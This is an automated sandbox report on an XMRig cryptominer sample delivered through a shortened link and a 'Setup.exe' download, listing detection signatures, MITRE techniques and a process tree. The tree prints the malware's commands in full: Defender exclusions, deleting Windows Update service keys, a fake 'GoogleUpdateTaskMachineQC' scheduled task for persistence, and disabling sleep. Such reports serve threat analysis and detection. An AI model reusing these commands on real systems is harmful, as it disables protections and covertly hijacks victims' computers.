xmrig | hxxps://bit[.]ly/3m4a6Dy

Analysis

max time kernel
17s
max time network
98s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
04/03/2023, 23:47

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://bit.ly/3m4a6Dy

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/5920-719-0x00007FF764CD0000-0x00007FF7654C4000-memory.dmp	xmrig
behavioral1/memory/5920-721-0x00007FF764CD0000-0x00007FF7654C4000-memory.dmp	xmrig

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5920-719-0x00007FF764CD0000-0x00007FF7654C4000-memory.dmp	upx
behavioral1/memory/5920-721-0x00007FF764CD0000-0x00007FF7654C4000-memory.dmp	upx

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1432	sc.exe
5668	sc.exe
5748	sc.exe
5760	sc.exe
5508	sc.exe
5008	sc.exe
1532	sc.exe
3164	sc.exe
5180	sc.exe
4628	sc.exe
4588	sc.exe
1276	sc.exe
880	sc.exe
1308	sc.exe
2044	sc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1532	powershell.exe
1532	powershell.exe
3304	msedge.exe
3304	msedge.exe
3232	msedge.exe
3232	msedge.exe
4580	msedge.exe
4580	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1532	powershell.exe

Suspicious use of FindShellTrayWindow 17 IoCs

pid	Process
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2608	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3232 wrote to memory of 4760	3232	msedge.exe	87
PID 3232 wrote to memory of 4760	3232	msedge.exe	87
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 1516	3232	msedge.exe	88
PID 3232 wrote to memory of 3304	3232	msedge.exe	89
PID 3232 wrote to memory of 3304	3232	msedge.exe	89
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90
PID 3232 wrote to memory of 5028	3232	msedge.exe	90

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start shell:Appsfolder\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge https://bit.ly/3m4a6Dy
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-redirect=Windows.Launch https://bit.ly/3m4a6Dy
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb0b6e46f8,0x7ffb0b6e4708,0x7ffb0b6e4718
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
  2⤵
  PID:1516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
  2⤵
  PID:688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
  2⤵
  PID:3684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
  2⤵
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
  2⤵
  PID:988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5876 /prefetch:8
  2⤵
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6976 /prefetch:8
  2⤵
  PID:1268
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6976 /prefetch:8
  2⤵
  PID:492
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  PID:4876
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7396e5460,0x7ff7396e5470,0x7ff7396e5480
    3⤵
    PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
  2⤵
  PID:5784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1
  2⤵
  PID:5796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
  2⤵
  PID:5988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14570555349378946482,17808043073105668226,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
  2⤵
  PID:6004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3384

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2608

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:264

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5232

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Goofeys files\" -spe -an -ai#7zMap14510:88:7zEvent25209
1⤵
PID:5652

C:\Users\Admin\Downloads\Goofeys files\Setup.exe
"C:\Users\Admin\Downloads\Goofeys files\Setup.exe"
1⤵
PID:5244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:2436

C:\Users\Admin\Downloads\Goofeys files\Setup.exe
"C:\Users\Admin\Downloads\Goofeys files\Setup.exe"
1⤵
PID:4688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5624

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:6088
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3164
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4588
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5668
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:5760
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:5508
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:5492
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:4540
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:5604
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:1676
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:4588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ujotz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:5824

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5816
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:5740
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:1600
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:5556
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5980

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:584
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1276
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5748
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5180
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:880
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:4628
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:2020
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:432
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:1204
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:780
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:1744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ujotz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:2340

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5616
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:6052
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:5820
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:5644
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#sxbxgkwn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:5444
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
  2⤵
  PID:2176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#sxbxgkwn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:5808
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
  2⤵
  PID:2456

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:5660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:2228

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:5996

C:\Windows\System32\cmd.exe
